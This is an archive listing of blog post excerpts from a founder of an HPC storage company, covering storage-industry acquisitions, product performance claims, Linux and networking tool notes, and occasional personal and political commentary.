Voting in HPCWire's readers choice awards are open, please vote!
Our friends at Lucera are in number 6 for best use of HPC in a financial services category. Our Unison product is at number 11 for Best HPC Storage Product or Technology. And I did a write in for #21 for us :D. Our friends at Mellanox have their 100Gb EDR Infiniband technology at number 14. Please do vote (early, not often).
Posts
M&A: Seagate snarfs up DotHill
The Register reports this morning, that Seagate has acquired DotHill. DotHill makes arrays and their kit is resold and rebadged by many. In general the array market (high end) is in a decline, and doesn’t show signs of turning around (ever). The low and mid market, including some of the cloud bits is growing. I am not sure about the OCP stuff, but the low end bits are where we are seeing 4, 8, and 12 drive arrays show up as completely commoditized gear.
Posts
Scalable Informatics 13th year anniversary on Saturday
We started the company on 1-August-2002. I remember arguing with a senior VP at SGI over his decision to abandon linux clusters in Feb 2001. That was the catalyst for me leaving SGI, but I was too chicken to start Scalable then. I thought I could do better than them. I went to another place for 15 months or so. Tried jumpstarting an HPC group there … hired lots of folks, pursued lots of business.
Posts
M&A fallout: Cisco may have ditched Invicta after buying Whiptail
Article is here, take it as a rumor until we hear from them. My comments: First, M&A; is hard. You need a good fit product wise (little overlap and great complementary functions/capabilities), and a culture/people fit matter. Second, sales teams need to be on-board selling complete solutions involving the acquired tech. Sometimes this doesn’t happen, for any number of reasons, some fixable, some not. Third, Cisco is out of the storage game if this is true.
Posts
On storage unicorns and their likely survival or implosion
The Register has a great article on storage unicorns. Unicorns are not necessarily mythical creatures in this context, but very high valuation companies that appear to defy “standard” valuation norms, and hold onto their private status longer than those in the past. That is, they aren’t in a rush to IPO or get acquired.
The article goes on to analyze the “storage” unicorns, those in the “storage” field. They admix storage, nosql, hyperconverged, and storage as a service.
Posts
M&A or more correctly, acqui-hire: Cray bags much of Terascala
Terascala appears to have been disassembled, with much of the team going to Cray. Terascala started out selling internally developed storage appliances for Lustre. They developed deployment, monitoring, and management tools. Their UI was reasonably good. Then they struck up a deal with Dell and a few others. In doing so, they largely stopped their appliance sales. Put their code upon their partners hardware. This did generate more force multipliers for them in sales, but it cost them some of their differentiation … unless their boxes were entirely undifferentiated, where it would reduce their overall costs to avoid selling undifferentiated hardware.
Posts
Potential M&A: Micron being pursued
I was heads down all day yesterday working on a few things. Apparently this is widely known now, but I saw it late last night. Micron is being pursued by a group affiliated with Tsinghua University. There is a political angle to this group, as they are connected to the government through their management. Why is this interesting (the acquisition potential that is). Well, there are 4 basic Flash fabs out there these days.
Posts
M&A [RUMOR]: Cisco grabs Nutanix
[update] TL;DR this appears to be rumor/speculation. One would think that such an acquisition would be prominent on Nutanix’s web site. Its April fools, in May. /sigh
Huge in the hyperconverged space (which, not so curiously, is where the day job is), and its setting up the battle lines between the major software/hardware players. Cisco was already number 5 hardware vendor, and was bragging about “beating the white boxes”. The last may be more wishful thinking than reality.
Posts
Interesting Q1 so far for day job
Our Q1 is usually quiet, fairly low key. Not this one. Looks like lots of pent up demand. We are deep into record territory, running 200+% of normal, with possibility of more. Another new wrinkle is that our small investment round is mostly complete. This is new territory for us, and you may have noticed I’d backed off posting intensity over the last half year or so while this was going on.
Posts
Memory channel flash: is it over?
[full disclosure: day job has a relationship with Diablo] Russell just pointed this out to me. The short (pedestrian) version (I’ve got no information that is not public, so I can’t disclose something I don’t know anyway): Netlist filed a patent infringement suit against Diablo, and then included SanDisk as they bought Smart Storage, whom worked with Diablo prior to Smart being acquired by SanDisk. Netlist appears to have won an, at least temporary, injunction against Diablo.
Posts
M&A in our space
The day job’s products have never been stronger, fit together as well, or had as great a story arc as they do today. We can deliver denser, faster, easier to setup and manage systems quite easily. Our application stacks run atop this system on our ample computing power, and we provide massive network pipes in/out, as data motion is hard. Many more cool things are coming, but for now, we are working very hard on building something awesome.
Posts
Why doesn't linkedin make removing a contact easy?
I don’t get this. Yeah, sure, your contacts are curated, and I don’t accept everyone. I need to see some aspect of a connection and be pretty sure they wont spam me personally or try to spam my contacts. So when I find out that this is what happens, I want to block their access to me. Which usually means un-connecting with them. So why does LinkedIn make this effectively impossible on the phone apps?
Posts
[Update] debunked ... (was IBM layoffs to hit 25% or so of the company)
[Update] As I had wondered, and other suggested to me, this number (25%) was likely a click bait fabrication. Forbes and others also “fell for it.” I’ll admit I did as well. It was too large to ignore, but it also didn’t make sense. Close down mainframe and storage? Seriously? Lets call this what it is, an internet rumor that was busted. Paraphrasing Mark Twain “An internet rumor can travel around the world while the truth is still putting on its shoes”.
Posts
Inventory reduction @scalableinfo
Its that time of year, when the inventory fairies come out and begin their counting. Math isn’t hard, but the day job would like a faster and easier count this year. So, the day job is working on selling off existing inventory. We have 4 units ready to go out the door to anyone in need of 70-144TB usable storage at 5-6 GB/s per unit. Specs are as follows:
16-24 processor cores 128 GB RAM 48x {2,3,4} TB top mount drives 4x rear mount SSDs (OS/metadata cache) Scalable OS (Debian Wheezy based Linux OS) 3 year warranty As this is inventory reduction, the more inventory you take, the happier we are (and the less work that the inventory fairies have to do).
Posts
Learning to respect my gut feelings again
A “gut feeling” is, at a deep level, a fundamental sense of something that you can’t necessarily ascribe metrics to, you can’t quantify exactly. Its not always right. Its a subconscious set of facts, ideas, concepts that seem to suggest something below the analytical portion of your mind, and it could bias you into a particular set of directions. Or you could take it as an aberration and go with “facts”.
Posts
SC14 T minus 6 and counting
Scalable’s booth is #3053. We’ll have some good stuff, demos, talks, and people there. And coffee. Gotta have the coffee. More soon, come by and visit us!
Posts
HP to split up
Interesting changes in the corporate M&A; or disaggregation arena. With M&A;, you are looking to build market strength by acquiring valuable IP, assets, brands, names, teams, capabilities, trade secrets, special sauces, etc. You do that to make your group stronger and more capable of handling the challenges ahead. With a disaggregation, you slice off disparate portions of the business, and set them free to pursue their own path. This is what was rumored a few weeks ago with EMC, a possible split of the federated businesses.
Posts
Interesting bits around EMC
In the last few days, issues around EMC have become publicly known. EMC is the worlds largest and most profitable storage company, and has a federated group of businesses that are complementary to it. The CEO, Joe Tucci, is stepping down next year, and there is a succession “process” going on. Couple this to a fundamental shift in storage, from arrays to distributed tightly coupled server storage, such as Unison, which is problematic for their core business.
Posts
An article on Detroit that is worth the read
Detroit had filed for bankruptcy protection a while ago. The rationale for this was simple, they simply did not have the cash flow to pay for all their liabilities. They had limited access to debt markets for a number of reasons, and they couldn’t keep cranking up the taxes on residents and businesses in the city to generate revenue. They were between a rock and a hard place. I have a soft spot in my heart for Detroit.
Posts
Definition of vacation
… appears to be normal working hours from a location that is not your office, home … I am supposed to be on vacation. A short one, as there are simply far too many things on my plate (notice my recent posting frequency?). Instead, I am trying to solve problems for customers, sign NDAs, handle support calls. What was the purpose of vacation or holiday again? I keep forgetting.
Posts
Comcast finally fixed their latency issue
This has been a point of contention for us for years. Our office has multiple network attachments, using Comcast is part of it. This is the main office, not the home office. Latency on the link, as measured by DNS pings, have always been fairly high, in the multiple 2-3ms region, as compared to our other connection (using a different provider and a different technology) which has been consistently, 0.5ms for the last 2 years.
Posts
M&A: PLX snarfed by ... Avago ?
Ok, didn’t see this acquirer coming, but PLX being bought … yeah, this makes sense. Avago looks like they are trying to become the glue between systems, whether the glue is a data storage fabric, or communications fabric, etc. PLX makes PCIe switches and other kit. PCIe switch and interconnection is the direction that many are converging to. Best end to end latencies, best per-lane performance, no protocol stack silliness to deal with.
Posts
Doing what we are passionate about
I am lucky. I fully admit this. There are people out there whom will tell you that its pure skill that they have been in business and been successful for a long time. Others will admit luck is part of it, but will again, pat themselves on the back for their intestinal fortitude. Few will say “I am lucky”. Which is a shame, as luck, timing (which you can never really, truly, control), and any number of other factors really are critical to one being able to have the luxury of doing what we are doing.
Posts
We had a record setting, knock the barn doors down year last year
… and believe it or not, I forgot to mention it. This is the first time in company history that we had a backlog going into Q1. Orders being built and tested on the last work day of the year. We grew, not the amount we had originally forecast, but we understand why (and sadly have little control over that aspect). We are working very hard on our appliances … I am blown away as to how perfect a fit they are for folks.
Posts
Calxeda restructures
The day job had been talking to and working with Calxeda for a while. They’ve been undergoing some changes over the last few months as they worked to transition from an evangelist to a systems builder. The day job just got a note that they are restructuring. What this specifically means to an outsider, I am not sure, though I could speculate. HP has a vested interest in them. I wouldn’t be surprised to see a rapid asset acquisition.
Posts
Violin kicks out founding CEO
Story at The Register. Usually you give a CEO some time to right a listing ship. I pointed out in a recent post that there are some significant grumblings about Violin and in fact about most of the flash-as-rack-appliance space. I had noted
We’ve run into them a few times in competitive situations, so take what I write about them with an appropriate mass of NaCl. All the pure-play flash array vendors have to answer a basic question about their existence.
Posts
Oh dear lord
Lets see if this actually materializes. Its pretty obvious as to how hard the media folks tried to spin this with the title. A good rubric for how the US media treats the president and his opposition could be found in this cartoon. With that in mind, read the title of that article, and then note this little tidbit on the inside:
Notice the scare quotes around the word treason. Treason has a very straighforward definition in the US Constitution.
Posts
Part of the reason why Detroit has a long rough road ahead
is due, in significant part, to bad law and bad policy enshrined in law. Ideological view points are hard coded in the firmware of Michigan. Which allows lawsuits and results such as this. It cannot be overemphasized how bone-headed this particular law is. That one can never, under any circumstances, reduce pensioner benefit values. This means, if you ever struck a bad deal, like Detroit, and many others in Michigan have, you have no choice but to continue this bad deal for eternity.
Posts
... and bang goes Detroit ...
This brings me no joy. I went to grad school in Detroit. I like this city. It has character, it has guts, it has potential. It also has no cash to continue operations. And that sucks. Detroit filed for chapter 9 bankruptcy a few hours ago. There are many reasons for this, but there are a number of specific ones, that are generalizable to businesses as well. First, population decline has led to a tax revenue decline.
Posts
That's what now ... 5 live scandals?
[Update] That didn’t take long. Looks like the government is angry about all of this. The leak of the leaks that is. And they are going to try to find the culprit, and prosecute them. Any “Mea Culpas” from them on the fact that this is … I dunno … illegal? Er … no. Most transparent admin … evuh??? I read something last week which made me laugh. It read “tomorrow is Thursday, time for a new scandal”.
Posts
Don't know if I mentioned it, but the day job has a new website
Take a gander. Some things are missing, and our marketing folks are developing the content where needed, and revising it where we have existing content. Its quite refreshing to see this. It will get better over time. Its running in our facility now, and likely we’ll have a few clones in the cloud as well. But thats for later.
Posts
#youknowyouaretravelingwaytoomuchwhen ...
… the guy driving the car rental bus recognizes you and talks about how often you’ve been there.
Category: cloud
Posts
Looking forward to #SC18 next week and a discussion of all things #HPC
I’m attending SC18 next week. It’s been 3 years since I last attended (2015). Then we (@scalableinfo) had a large booth, lots of traffic, and showed off some of the first commercial NVMe high performance storage systems running BeeGFS over 100GbE.
I am looking forward to talking with as many people as I can, to get their perspectives on things. To see what they are thinking, hear what they are doing, and in which direction they are going.
Posts
Finally got to use MCE::* in a project
There are a set of modules in the Perl universe that I’ve been looking for an excuse to use for a while. They are the MCE set of modules, which purportedly enable easy concurrency and parallelism, exploiting many core CPUs, and a number of techniques. Sure enough, I had a task to handle recently that required this. I looked at many alternatives, and played with a few, including Parallel::Queue. I thought of writing my own with IPC::Run as I was already using it in the project, but I didn’t want to lose focus on the mission, and re-invent a wheel that already existed elsewhere.
Posts
What is old, is new again
Way back in the pre-history of the internet (really DARPA-net/BITNET days), while dinosaur programming languages frolicked freely on servers with “modern” programming systems and data sets, there was a push to go from a static linking programs to a more modular dynamic linking. The thought processes were that it would save precious memory, not having many copies of libc statically linked in to binaries. It would reduce file sizes, as most of your code would be in libraries.
Posts
Fully RAMdisk booted CentOS 7.2 based SIOS image for #HPC , #bigdata , #storage etc.
This is something we’ve been working on for a while … a completely clean, as baseline a distro as possible, version of our SIOS RAMdisk image using CentOS (and by extension, Red Hat … just need to point to those repositories). And its available to pull down and use as you wish from our download site. Ok, so what does it do? Simple. It boots an entire OS, into RAM. No disks to manage and worry over.
Posts
Raw Unapologetic Firepower: kdb+ from @Kx
While the day job builds (hyperconverged) appliances for big data analytics and storage, our partners build the tools that enable users to work easily with astounding quantities of data, and do so very rapidly, and without a great deal of code. I’ve always been amazed at the raw power in this tool. Think of a concise functional/vector language, coupled tightly to a SQL database. Its not quite an exact description, have a look at Kx’s website for a more accurate one.
Posts
When infinite resources aren't, and why software assumes they are infinite
We’ve got customers with very large resource machines. And software that sees all those resources and goes “gimme!!!!”. So people run. And then more people use it. And more runs. Until the resources are exhausted. And hilarity (of the bad kind) ensues. These are firedrills. I get an open ticket that “there must be something wrong with the hardware”, when I see all the messages in console logs being pulled in from ICL saying “zOMG I am out of ram ….
Posts
"Unexpected" cloud storage retrieval charges, or "RTFM"
An article appeared on HN this morning. In it, the author noted that all was not well with the universe, as their backup, using Amazon’s Glacier product, wound up being quite expensive for a small backup/restore. The OP discovered some of the issues with Glacier when they began the restore (not commenting on performance, merely the costing). Basically, to lure you in, they provide very low up front costs. That is, until you try to pull the data back for some reason.
Posts
There are no silver bullets, 2015 edition
In Feb 2013, I opined (with some measure of disgust) that people were looking at various software packages as silver bullets, these magical bits of a stack which could suddenly transform massive steaming piles of bits (big … uh … “data” ?) into golden nuggets of actionable data. Many of the “solutions” marketed these days are exactly like that … “add our magic bean software to your pipeline and you will gain insight faster.
Posts
Updated net-tools bits
So far, 3 components, and working to fix a few things in formatting. On github, grab it here. First, lsbond.pl to report about bond details
root@unison-mgr-1:~/net-tools# ./lsbond.pl bond0: mac 0c:c4:7a:48:69:cb state up mode fault-tolerance (active-backup) xmit_hash layer2 0 active slave eth1 polling 100 ms up_delay 200 ms down_delay 200 ms slave nics: eth1: mac 0c:c4:7a:48:69:cb, link 1, state up, speed 1000, driver igb, version 5.3.2.2 firmware version 1.61,0x8000090e bond1: mac 00:12:c0:80:26:76 state up mode fault-tolerance (active-backup) xmit_hash layer2 0 active slave eth3 polling 100 ms up_delay 200 ms down_delay 200 ms slave nics: eth2: mac 00:12:c0:80:26:76, link 1, state up, speed 10000, driver ixgbe, version 4.
Posts
The worlds fastest hyper-converged appliance is faster and more affordable than ever
This is a very exciting hyper-converged system, representing our next generation of time series, and big data analytical systems. Tremendous internal bandwidths coupled with massive internal parallelism, and minimal latency design on networks. This unit has been designed to focus upon delivering the maximal performance possible in an as minimal footprint … both rack based and cost wise … as possible. You can use these as independent stand alone units, integrate them into a larger FastPath Unison system We have our software stack (SIOS) integrated onto each unit, and include our builds of Python + Pandas/SciPy/NumPy, R, and Perl.
Posts
Real measurement is hard
I had hinted at this last week, so I figure I better finish working on this and get it posted already. The previous bit with language choice wakeup was about the cost of Foreign Function Interfaces, and how well they were implemented. For many years I had honestly not looked as closely at Python as I should have. I’ve done some work in it, but Perl has been my go-to language.
Posts
Systemd, and the future of Linux init processing
An interesting thing happened over the last few months and years. Systemd, a replacement init process for Linux, gained more adherents, and supplanted the older style init.d/rc scripting in use by many distributions. Ubuntu famously abandoned init.d style processing in favor of upstart and others in the past, and has been rolling over to systemd. Red Hat rolled over to Systemd. As have a number of others. Including, surprisingly, Debian. For those whom don’t know what this is, think of it this way.
Posts
Starting to come around to the idea that swap in any form, is evil
Here’s the basic theory behind swap space. Memory is expensive, disk is cheap. Only use the faster memory for active things, and aggressively swap out the less used things. This provides a virtual address space larger than physical/logical memory. Great, right? No. Heres why.
swap makes the assumption that you can always write/read to persistent memory (disk/swap). It never assumes persistent memory could have a failure. Hence, if some amount of paged data on disk suddenly disappeared, well … Put another way, it increases your failure likelihood, by involving components with higher probability of failure into a pathway which assumes no failure.
Posts
SC14 T minus 6 and counting
Scalable’s booth is #3053. We’ll have some good stuff, demos, talks, and people there. And coffee. Gotta have the coffee. More soon, come by and visit us!
Posts
Solved the major socket bug ... and it was a layer 8 problem
I’d like to offer an excuse. But I can’t. It was one single missing newline. Just one. Missing. Newline. I changed my config file to use port 10000. I set up an nc listener on the remote host.
nc -k -l a.b.c.d 10000 Then I invoked the code. And the data showed up. Without a ()&(&%&$%*&(^ newline. That couldn’t possibly be it. Could it? No. Its way to freaking simple.
Posts
InfluxDB cli is up on github
I know there is a node version, and I did try it before I wrote my own. Actually, the reason I wrote my own was that I tried it and … well … Link is here. And yes, the readme is borked about 1/2 way through. Doesn’t quite show the formatting of the output quite right. Will try to fix over the weekend, as I move this a far more feature complete bit.
Posts
Have a nice cli for InfluxDB
I tried the nodejs version and … well … it was horrible. Basic things didn’t work. Made life very annoying. So, being a good engineering type, I wrote my own. It will be up on our site soon. Here’s an example
./influxdb-cli.pl --host 192.168.5.117 --user test --pass test --db metrics metrics> \list series
.----------------------------------. | series name | +----------------------------------+ | lightning.cpuload.avg1 | | lightning.cputotals.idle | | lightning.cputotals.irq | | lightning.
Posts
Be on the lookout for 'pauses' in CentOS/RHEL 6.5 on Sandy Bridge
Probably on Ivy Bridge as well. Short version. The pauses that plagued Nehalem and Westmere are baaaack. In RHEL/CentOS 6.5 anyway. A customer just ran into one. We helped diagnose/work around this a few years ago when a hedge fund customer ran into this … then a post-production shop … then … Basically the problem came in from the C-states. The deeper the sleep state, in some instances, the processor would not come out of it, or get stuck in the lower levels.
Posts
Doing what we are passionate about
I am lucky. I fully admit this. There are people out there whom will tell you that its pure skill that they have been in business and been successful for a long time. Others will admit luck is part of it, but will again, pat themselves on the back for their intestinal fortitude. Few will say “I am lucky”. Which is a shame, as luck, timing (which you can never really, truly, control), and any number of other factors really are critical to one being able to have the luxury of doing what we are doing.
Posts
Yay, latest Java update broke Supermicro remote console
JRE 7 u 51. Self signed Java console applet. Let the hilarity begin. I tried uploading our own cert and key to the unit. No luck. Its the applet the needs to be re-signed. This is the joyous message that awaits:
Of course, the IPMIview tool sorta kinda works. Though its useless for remote support ops. Doesn’t set off the signed issue. Mebbe they ignore signing? Which is worse … the self signed cert, or the sign ignoring app.
Posts
More blurring of lines between platform providers and competitors
I had pointed out recently that large platform as a service, or pretty much any *aaS type model, where you present your value atop someone elses platform, leveraging their technologies, is ripe for having the *aaS provider decide they want to move into your space. Once you’ve done the hard work of proving there is a space in the first place. Well, the Register has an article on this now. I gave a number of specific examples, and pointed out that Amazon isn’t the first to do this, Microsoft had previously done this to the level of an art form.
Posts
... and the positions are now, finally open ...
See the Systems Engineering position here, and the System Build Technician position here. I’ll get these up on the InsideHPC.com site and a few others soon (tomorrow). But they are open now. For the Systems Engineering position, we really need someone in NYC area with a strong financial services background … Doug made me take out the “able to leap tall buildings in a single bound” line, as well as the “must be able to talk customers through complex vi sessions on system configuration files while driving 70 mph on a highway.
Posts
started playing with SmartOS for the day job
This is a very cool concept, something that meshes perfectly with our Tiburon based siCluster philosophy. That is, compute nodes should boot diskless, there should be very little state on each node, and stuff that you need to do should be made absolutely as simple as possible. SmartOS is a project of Joyent. Joyent, for those not familiar with them, are a cloud company, building a nice public cloud for end users to build on.
Posts
Day job PR: JRTI and Scalable Informatics Form Strategic Partnership
Will be up on the day job site tomorrow. We are very excited by these developments, and look forward to a productive relationship
JRTI and Scalable Informatics Form Strategic Partnership to Provide High Performance Storage and CPU & GPU Clusters to Organizations Seeking Exceptional Results Richmond, Virginia (January 18, 2011)-James River Technical, Inc (JRTI), specialists in accelerated and HPC solutions for the higher education, research, government, and commercial market segments, has entered into a reseller agreement with Scalable Informatics (Scalable) to provide Storage and HPC solutions throughout North America.
Posts
This is good news
Univa grabs GridEngine. Specifically:
Hat tip to Chris D for pointing it out. This directly addresses one of my major concerns on the longevity of GE. It also makes me feel a bit safer about using/deploying GE for users/customers. Specifically, if a committed and large/stable enough OSS project and/or committed company were to drive this, engage and work with the community to grow it, yeah … I am comfortable with this.
Category: clouds
Posts
#HPC in all the things
I read this announcement this morning. Our friends at Facebook releasing their reduced precision server side convolution and GEMM operations.
Many years ago, I tried to convince people that HPC moves both down market, into lower cost hardware, as well as more widely into more software toolchains. Basically, the decades of experience building very high performance applications and systems will have value downstream for many users over time.
GEMM is a generalized approach to a matrix multiply, which has been well optimized for HPC applications in various scientific libraries over time.
Posts
Well ... that was fun
So … I’ve had this blog since 2005. I installed it from original sources. And WP made upgrades in the 2.x time frame, quite painless.
Or so it seemed.
Slowly, over time, some configuration/settings/whatever got out of whack. And with the last update, from a system originally installed in final form in 2013 or so, something broke.
I am not sure what. But the symptoms were simple … new posts would replace the most recent posts.
Posts
On technology zealotry
I’ve encountered this in my career, at many places. Sadly, early in my career, I participated in some of this. You are a zealot for a particular form of tech if you can see it do no wrong, and decry reports of issues or problems as “attacks”. You are a zealot against a particular form of tech if you cannot see it as a potentially useful and valuable portion of a solution stack, and (often gleefully) amplify reports of issues or problems.
Posts
What reduces risk ... a great engineering and support team, or a brand name ?
I’ve written about approved vendors and “one throat to choke” concept in the past. The short take from my vantage point as a small, not well known, but highly differentiated builder of high performance storage and computing systems … was that this brand specific focus was going to remove real differentiated solutions from market, while simultaneously lowering the quality and support of products in market. The concept of brand and marketing of a brand is about erecting barriers to market entry against the smaller folk whom might have something of interest, and the larger folk who might come in with a different ecosystem.
Posts
What is old, is new again
Way back in the pre-history of the internet (really DARPA-net/BITNET days), while dinosaur programming languages frolicked freely on servers with “modern” programming systems and data sets, there was a push to go from a static linking programs to a more modular dynamic linking. The thought processes were that it would save precious memory, not having many copies of libc statically linked in to binaries. It would reduce file sizes, as most of your code would be in libraries.
Posts
ClusterHQ dies
ClusterHQ is now dead. They were an early container play, building a number of tools around Docker/etc. for the space. Containers are a step between bare metal and VMs. FLocker (ClusterHQ’s product) is open source, and they were looking to monetize it in a different way (not on acquisition, but on support). In this space though, Kubernetes reigns supreme. So competing products/projects need to adapt or outcompete. And its very hard to outcompete something like k8s.
Posts
A good read on realities behind cloud computing
In this article on the venerable Next Platform site, Addison Snell makes a case against some of the presumed truths of cloud computing. One of the points he makes is specifically something we run into all the time with customers, and yet this particular untruth isn’t really being reported the way our customers look at it. Sure, you are paying for the unused capacity. This is how utility models work. Tenancy is the most important measure to the business providing the systems.
Posts
Fully RAMdisk booted CentOS 7.2 based SIOS image for #HPC , #bigdata , #storage etc.
This is something we’ve been working on for a while … a completely clean, as baseline a distro as possible, version of our SIOS RAMdisk image using CentOS (and by extension, Red Hat … just need to point to those repositories). And its available to pull down and use as you wish from our download site. Ok, so what does it do? Simple. It boots an entire OS, into RAM. No disks to manage and worry over.
Posts
Raw Unapologetic Firepower: kdb+ from @Kx
While the day job builds (hyperconverged) appliances for big data analytics and storage, our partners build the tools that enable users to work easily with astounding quantities of data, and do so very rapidly, and without a great deal of code. I’ve always been amazed at the raw power in this tool. Think of a concise functional/vector language, coupled tightly to a SQL database. Its not quite an exact description, have a look at Kx’s website for a more accurate one.
Posts
new SIOS feature: compressed ram image for OS
Most people use squashfs which creates a read-only (immutable) boot environment. Nothing wrong with this, but this forces you to have an overlay file system if you want to write. Which complicates things … not to mention when you overwrite too much, and run out of available inodes on the overlayfs. Then your file system becomes “invalid” and Bad-Things-Happen(™). At the day job, we try to run as many of our systems out of ram disks as we can.
Posts
It is 2016 ... why am I fighting with LDAP authentication in linux? Why doesn't it just work?
Ok … very long story that boils down to us trying to help a customer out. I am trying to avoid the “lets just add another user to /etc/passwd” or similar such thing. And they aren’t quite ready to hook into AD or similar. So we have this issue. I want to enable their nodes to use ldap. I’ve done this before for other customers with older tools (pam_ldap, etc.). But it was somewhat crazy (as in non-trivial), involving gnashing of teeth, gums, etc.
Posts
Not even breaking a sweat: 10GB/s write to single node Forte unit over 100Gb net #realhyperconverged #HPC #storage
TL;DR version: 10GB/s write, 10GB/s read in a single 2U unit over 100Gb network to a backing file system. This is tremendous. The system and clients are using our default tuning/config. Real hyperconvergence requires hardware that can move bits to/from storage/networking very quickly. This is that. These units are available. Now. In volume. And are very reasonably priced (starting at $1USD/GB). Contact us for more details. This is with a file system …
Posts
Massive unapologetic storage firepower part 4: On the test track with a Forte unit ... vaaaaROOOOOOMMMMMMM!!!!!
I am trying to help people conceptualize the experience. Here is a video depicting very fast, very powerful cars and their sound signatures.
This is a good start. Take one of those awesome machines, and turn off half the engine. So it is literally running with 1/2 of its power turned off. Remember this. There will be a quiz. As we flippantly noted in the video, this is face-melting performance. Had I any hair left, it would have been blown way back.
Posts
"Unexpected" cloud storage retrieval charges, or "RTFM"
An article appeared on HN this morning. In it, the author noted that all was not well with the universe, as their backup, using Amazon’s Glacier product, wound up being quite expensive for a small backup/restore. The OP discovered some of the issues with Glacier when they began the restore (not commenting on performance, merely the costing). Basically, to lure you in, they provide very low up front costs. That is, until you try to pull the data back for some reason.
Posts
Video interview: face melting performance in #hpc #nvme #storage @scalableinfo
Oh no … we didn’t say “face melting” … did we? Oh. Yes. We. Did. The interview is here at the always wonderful InsideHPC.com You can see the video itself here on YouTube, but read Rich’s transcript. I was losing my voice, and he captured all of the interview in text. Take home messages: Insane IO/Networking/processing performance, small footprint, tiny price, available for orders now.
Posts
A wonderful read on metrics, profiling, benchmarking
Brendan Gregg’s writings are always interesting and informative. I just saw a link on hacker news to a presentation he gave on “Broken Performance Tools”. It is wonderful, and succinctly explains many thing I’ve talked about here and elsewhere, but it goes far beyond what I’ve grumbled over. One of my favorite points in there is slide 83. “Most popular benchmarks are flawed” and a pointer to a paper (easy to google for).
Posts
Shiny #HPC #storage things at #SC15
Assuming everything goes as planned (HA!) we should have a number of very cool things at SC15.
* 100Gb [Unison storage system with BeeGFS](https://scalableinformatics.com/unison) * 100Gb [Unison Ceph](https://scalableinformatics.com/unison) system * 100Gb connection to a partner/customer booth * Forte 100Gb is awesome. The first time I ran an iperf bidirectional test, saw 20GB/s … it blew me away. 40/56GbE is old hat now, and 10GbE is in the rapidly receding past.
Posts
On storage unicorns and their likely survival or implosion
The Register has a great article on storage unicorns. Unicorns are not necessarily mythical creatures in this context, but very high valuation companies that appear to defy “standard” valuation norms, and hold onto their private status longer than those in the past. That is, they aren’t in a rush to IPO or get acquired.
The article goes on to analyze the “storage” unicorns, those in the “storage” field. They admix storage, nosql, hyperconverged, and storage as a service.
Posts
Gmail lossy email system
For months I’ve been noting that email to my 2 different GMail accounts (one for work on the business side using the Google Apps for business, and yes, paid for … and one for personal) are not getting all the emails sent to it. I’ve had customers reach out to me here at this site, as well as calling me up to ask me if I’ve been getting their email. Seems I’m not the only one, though the complaint here appears to be a bad filter and characterizing system.
Posts
When the revolution hits in force ...
Our machines will be there, helping power the genomics pipelines to tremendous performance. Performance is an enabling feature. Without it you cannot even begin to hope to perform massive scale analytics. With it, you can dream impossible dreams. This article came out talking about a massive performance analytics pipeline at Nationwide Children’s Hospital in Ohio. This pipeline runs on a cluster attached to Scalable Informatics FastPath Unison storage. This is a very dense, very fast system, interconnected with Mellanox FDR Infiniband, Chelsio 40GbE, and leveraging BeeGFS from thinkparq.
Posts
Amusing #fail
I use Mozilla’s thunderbird mail client. For all its faults, it is still the best cross platform email system around. Apple’s mail client is a bad joke and only runs on apple devices (go figure). Linux’s many offerings are open source, portable, and most don’t run well on my Mac laptop. I no longer use Windows apart from running in a VirtualBox environment. And I would never go back to OutLook anyway (used it once, 15 years ago or so … never again).
Posts
Inventory reduction @scalableinfo
Its that time of year, when the inventory fairies come out and begin their counting. Math isn’t hard, but the day job would like a faster and easier count this year. So, the day job is working on selling off existing inventory. We have 4 units ready to go out the door to anyone in need of 70-144TB usable storage at 5-6 GB/s per unit. Specs are as follows:
16-24 processor cores 128 GB RAM 48x {2,3,4} TB top mount drives 4x rear mount SSDs (OS/metadata cache) Scalable OS (Debian Wheezy based Linux OS) 3 year warranty As this is inventory reduction, the more inventory you take, the happier we are (and the less work that the inventory fairies have to do).
Posts
#SC14 day 2: @LuceraHQ tops @scalableinfo hardware ... with Scalable Info hardware ...
Report XTR141111 was just released by STAC Research for the M3 benchmarks. We are absolutely thrilled, as some of our records were bested by newer versions of our hardware with newer software stack. Congratulations to Lucera, STAC Research for getting the results out, and the good folks at McObject for building the underlying database technology. This result continues and extends Scalable Informatics domination of the STAC M3 results. I’ll check to be sure, but I believe we are now the hardware side of most of the published records.
Posts
SC14 T minus 6 and counting
Scalable’s booth is #3053. We’ll have some good stuff, demos, talks, and people there. And coffee. Gotta have the coffee. More soon, come by and visit us!
Posts
massive unapologetic firepower part 2 ... the dashboard ...
For Scalable Informatics Unison product. The whole system:
[ ](/images/dash-2.png)
Watching writes go by:
[ ](/images/dash-3.png)
Note the sustained 40+ GB/s. This is a single rack sinking this data, and no SSDs in the bulk data storage path. This dashboard is part of the day job’s FastPath product.
Posts
Updated boot tech in Scalable OS (SIOS)
This has been an itch we’ve been working on scratching a few different ways, and its very much related to forgoing distro based installers. Ok, first the back story. One of the things that has always annoyed me about installing systems has been the fundamental fragility of the OS drive. It doesn’t matter if its RAIDed in hardware/software. Its a pathway that can fail. And when it fails, all hell breaks loose.
Posts
Comcast disabled port 25 mail on our business account
We have a business account at home. I work enough from home that I can easily justify it. Fixed IP, and I run services, mostly to back up my office services. One of those services is SMTP. I’ve been running an SMTP server, complete with antispam/antivirus/… for years. Handles backup for some domains, but is also primary for this site. This is allowable on business accounts. Or it was allowable. 3 days ago, they seem to have turned that off.
Posts
Massive, unapologetic, firepower: 2TB write in 73 seconds
A 1.2PB single mount point Scalable Informatics Unison system, running an MPI job (io-bm) that just dumps data as fast as the little Infiniband FDR network will allow. Our test case. Write 2TB (2x overall system memory) to disk, across 48 procs. No SSDs in the primary storage. This is just spinning rust, in a single rack. This is performance pr0n, though safe for work.
usn-01:/mnt/fhgfs/test # df -H /mnt/fhgfs/ Filesystem Size Used Avail Use% Mounted on fhgfs_nodev 1.
Posts
Doing what we are passionate about
I am lucky. I fully admit this. There are people out there whom will tell you that its pure skill that they have been in business and been successful for a long time. Others will admit luck is part of it, but will again, pat themselves on the back for their intestinal fortitude. Few will say “I am lucky”. Which is a shame, as luck, timing (which you can never really, truly, control), and any number of other factors really are critical to one being able to have the luxury of doing what we are doing.
Posts
We had a record setting, knock the barn doors down year last year
… and believe it or not, I forgot to mention it. This is the first time in company history that we had a backlog going into Q1. Orders being built and tested on the last work day of the year. We grew, not the amount we had originally forecast, but we understand why (and sadly have little control over that aspect). We are working very hard on our appliances … I am blown away as to how perfect a fit they are for folks.
Posts
Calxeda restructures
